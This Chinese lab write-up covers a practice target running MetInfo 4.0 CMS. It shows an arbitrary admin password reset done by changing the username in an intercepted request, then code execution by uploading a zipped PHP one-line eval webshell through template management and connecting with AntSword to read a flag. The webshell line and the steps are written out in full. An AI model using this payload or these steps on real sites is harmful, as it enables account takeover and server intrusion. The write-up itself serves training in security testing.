在线靶场
可以通过访问极核官方靶场开启靶机实验:极核靶场 -> 渗透测试靶场 -> MetInfo 4.0
简介
MetInfo是一个开源的CMS程序,4.0版本存在任意用户密码重置以及文件上传
的漏洞。
漏洞复现
任意用户密码重置
打开网站首页,然后访问robots.txt
文件,获取关键信息:
- 管理员后台:
/admin/
- 用户登录:
/member/
![图片[1] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-111.png)
打开用户登录界面,注册一个账号后并且登录
![图片[2] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-112-1024x600.png)
![图片[3] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-113-1024x469.png)
登录上刚才注册的账号,然后点击修改基本信息,输入任意的密码,然后打开BurpSuite抓包软件后,点击提交信息,抓取数据包。
然后将数据包中的test(你自己注册的用户名)改为admin(管理员用户名),然后放行数据包,这样就完成了修改了admin用户(管理员账号)的密码。
![图片[4] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-114-1024x594.png)
![图片[5] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-115-1024x584.png)
访问管理员后台,输入账号:admin / 你修改的密码,成功进入后台!
![图片[6] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-116-1024x529.png)
文件上传漏洞
准备一个一句话木马:<?php eval($_POST["cmd"]); ?>
,然后重命名为shell.php
,然后将shell.php压缩为shell.zip
![图片[7] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-117-1024x643.png)
进入网站后台 -> 界面风格 -> 模板管理
,找到添加新模板,上传刚才制作的shell.zip
压缩包。
![图片[8] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-118-1024x453.png)
上传后会自动将压缩包里面的shell.php
文件解压到网站的/templates/
目录下,也就是说现在只需要访问url/templates/shell.php
即可访问到我们上传的一句话木马了。
![图片[9] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-119.png)
权限获取
使用蚁剑进行连接测试,发现可以连接刚才上传的一句话木马,连接后进入页面。
![图片[10] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-120-1024x603.png)
![图片[11] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-121-1024x687.png)
访问根目录 /
,即可看到flag
文件!至此已成功拿下靶机!
![图片[12] - 【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/04/image-122-1024x682.png)
THE END
暂无评论内容